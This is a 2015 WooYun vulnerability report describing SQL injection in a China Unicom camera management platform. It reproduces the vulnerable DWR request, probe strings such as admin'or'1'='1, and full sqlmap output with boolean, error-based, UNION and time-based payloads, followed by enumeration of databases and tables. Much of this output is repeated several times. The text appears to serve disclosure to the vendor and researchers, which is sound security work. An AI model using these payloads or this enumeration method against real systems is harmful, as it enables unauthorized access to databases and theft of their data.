中国联通某摄像管理平台存在SQL注入漏洞

发表于 2015年07月08日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0121611

漏洞标题：中国联通某摄像管理平台存在SQL注入漏洞

漏洞详情

披露状态：

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认，细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述：

SQL注入

详细说明：

偶然看见一个洞就有蓝v的白帽子“我是壮丁” http://**.**.**.**/whitehats/我是壮丁就去看看他发的漏洞http://**.**.**.**/bugs/wooyun-2010-061903然后也发现了一个SQL注入地址**.**.**.**/login.action注册一个账号在用户设置页面添加授权管理人员**.**.**.**/user/settingUser.action已知admin用户存在添加admin

提示正常添加admin'

疑似有问题添加admin'or'1'='1

提示正常然后抓包

**.**.**.**/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN

1	.../dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN

需要带cookie

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br>
y)? [y/N] n<br>
sqlmap identified the following injection points with a total of 67 HTTP(s) requ<br>
ests:<br>
---<br>
Place: URI<br>
Parameter: #1*<br>
    Type: boolean-based blind<br>
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=-7303' OR (9955=9955)#&batchId=2&locale=zh_CNType: error-based<br>
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=string:' AND (SELECT 8433 FROM(SELECT COUNT(*),CONCAT(0x71786c697<br>
1,(SELECT (CASE WHEN (8433=8433) THEN 1 ELSE 0 END)),0x71707a7071,FLOOR(RAND(0)*<br>
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Nimd'='Nimd&batch<br>
Id=2&locale=zh_CNType: UNION query<br>
    Title: MySQL UNION query (NULL) - 3 columns<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=string:' UNION ALL SELECT CONCAT(0x71786c6971,0x66616a73435941424<br>
854,0x71707a7071),NULL,NULL#&batchId=2&locale=zh_CNType: AND/OR time-based blind<br>
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=string:' AND 7962=BENCHMARK(5000000,MD5(0x424f5269)) AND 'hHRS'='<br>
hHRS&batchId=2&locale=zh_CN<br>
---<br>
[14:38:29] [INFO] the back-end DBMS is MySQL<br>
web application technology: Apache 2.0.64<br>
back-end DBMS: MySQL 5.0

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an

y)? [y/N] n

sqlmap identified the following injection points with a total of 67 HTTP(s) requ

ests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin

tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession

Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-

id=0&c0-param0=-7303' OR (9955=9955)#&batchId=2&locale=zh_CNType: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin

tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession

Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-

id=0&c0-param0=string:' AND (SELECT 8433 FROM(SELECT COUNT(*),CONCAT(0x71786c697

1,(SELECT (CASE WHEN (8433=8433) THEN 1 ELSE 0 END)),0x71707a7071,FLOOR(RAND(0)*

2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Nimd'='Nimd&batch

Id=2&locale=zh_CNType: UNION query

Title: MySQL UNION query (NULL) - 3 columns

Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin

tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession

Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-

id=0&c0-param0=string:' UNION ALL SELECT CONCAT(0x71786c6971,0x66616a73435941424

854,0x71707a7071),NULL,NULL#&batchId=2&locale=zh_CNType: AND/OR time-based blind

Title: MySQL < 5.0.12 AND time-based blind (heavy query)

Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin

tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession

Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-

id=0&c0-param0=string:' AND 7962=BENCHMARK(5000000,MD5(0x424f5269)) AND 'hHRS'='

hHRS&batchId=2&locale=zh_CN

---

[14:38:29] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.0.64

back-end DBMS: MySQL 5.0

数据库

available databases [5]:<br>
[*] db_register<br>
[*] dserver_1<br>
[*] information_schema<br>
[*] mysql<br>[*] test

available databases [5]:

[*] db_register

[*] dserver_1

[*] information_schema

[*] mysql [*] test

当前库current database: 'db_register'其中的表

Database: db_register<br>
[17 tables]<br>
+---------------------+<br>
| admin               |<br>
| admin_camera_group  |<br>
| admin_manage_camera |<br>
| appointuser         |<br>
| appserver           |<br>
| appserverassign     |<br>
| appserverinfo       |<br>
| db_version          |<br>
| devices             |<br>
| dserver_names       |<br>
| dservers            |<br>
| groups              |<br>
| languages           |<br>
| location            |<br>
| location_names      |<br>
| news                |<br>
| users               |<br>
+---------------------+

Database: db_register

[17 tables]

+---------------------+

| admin |

| admin_camera_group |

| admin_manage_camera |

| appointuser |

| appserver |

| appserverassign |

| appserverinfo |

| db_version |

| devices |

| dserver_names |

| dservers |

| groups |

| languages |

| location |

| location_names |

| news |

| users |

+---------------------+

看看users中的数据条数

漏洞证明：

添加admin

提示正常添加admin'

疑似有问题添加admin'or'1'='1

提示正常然后抓包

**.**.**.**/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN

1	.../dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN

需要带cookie

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br>
y)? [y/N] n<br>
sqlmap identified the following injection points with a total of 67 HTTP(s) requ<br>
ests:<br>
---<br>
Place: URI<br>
Parameter: #1*<br>
    Type: boolean-based blind<br>
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=-7303' OR (9955=9955)#&batchId=2&locale=zh_CNType: error-based<br>
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=string:' AND (SELECT 8433 FROM(SELECT COUNT(*),CONCAT(0x71786c697<br>
1,(SELECT (CASE WHEN (8433=8433) THEN 1 ELSE 0 END)),0x71707a7071,FLOOR(RAND(0)*<br>
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Nimd'='Nimd&batch<br>
Id=2&locale=zh_CNType: UNION query<br>
    Title: MySQL UNION query (NULL) - 3 columns<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=string:' UNION ALL SELECT CONCAT(0x71786c6971,0x66616a73435941424<br>
854,0x71707a7071),NULL,NULL#&batchId=2&locale=zh_CNType: AND/OR time-based blind<br>
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)<br>
    Payload: **.**.**.**:80/dwr/call/plaincall/DwrUserInfo.validateAppoin<br>
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession<br>
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-<br>
id=0&c0-param0=string:' AND 7962=BENCHMARK(5000000,MD5(0x424f5269)) AND 'hHRS'='<br>
hHRS&batchId=2&locale=zh_CN<br>
---<br>
[14:38:29] [INFO] the back-end DBMS is MySQL<br>
web application technology: Apache 2.0.64<br>
back-end DBMS: MySQL 5.0